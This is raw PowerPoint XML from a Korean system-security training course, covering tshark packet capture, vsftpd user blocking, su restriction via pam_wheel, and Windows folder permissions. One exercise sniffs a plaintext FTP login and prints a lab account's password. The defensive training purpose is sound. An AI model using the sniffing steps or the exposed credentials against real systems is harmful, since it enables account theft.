                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>r-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>rhost</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18"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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>r-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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즉</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>r-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정 원격 접속 탐지</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> –r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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4)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endParaRPr lang="ko-KR" altLang="en-US" sz="100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200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>개의 패킷 캡처 및 저장</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -c 200 –w packet.txt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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>저장된 패킷 검토</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -r packet.txt | more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 navy123 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: qwer1031) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 접속했음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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 vi /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   맨 마지막에 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>navy123’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 후 저장</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> restart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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다시 패킷을 캡처하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접근이 거부됨을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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-c : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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-r : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>_list</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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list) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18"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목록</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정 우회 접속 탐지</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/var/log/secure</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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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20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endParaRPr lang="ko-KR" altLang="en-US" sz="100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시스템 접속 로그 점검</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># tail /var/log/secure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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>원격에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>명령으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정으로 전환함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용 제한</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>#auth required pam_wheel.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>use_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주석</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>변경전</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>변경후</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endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다시 로그를 확인하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>계정으로 전환되지 않음을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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tail </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>UID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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PAM (Pluggable Authentication Modules)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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>. PAM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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pam_wheel.so</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pam_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group)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>GID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>그룹</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 접근 권한 설정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(Windows)</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20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Windows 2012</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>“파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>탐색기”에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> “로컬 디스크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(C:)” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>선택</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>navy06” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>폴더 선택 후 마우스 오른쪽 클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“속성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(R)” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>“보안” 탭 선택 후 “편집</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(E)...” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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빈 폴더에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>python_test.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 만든다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>밑의 내용을 따라서 입력한 후 저장</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
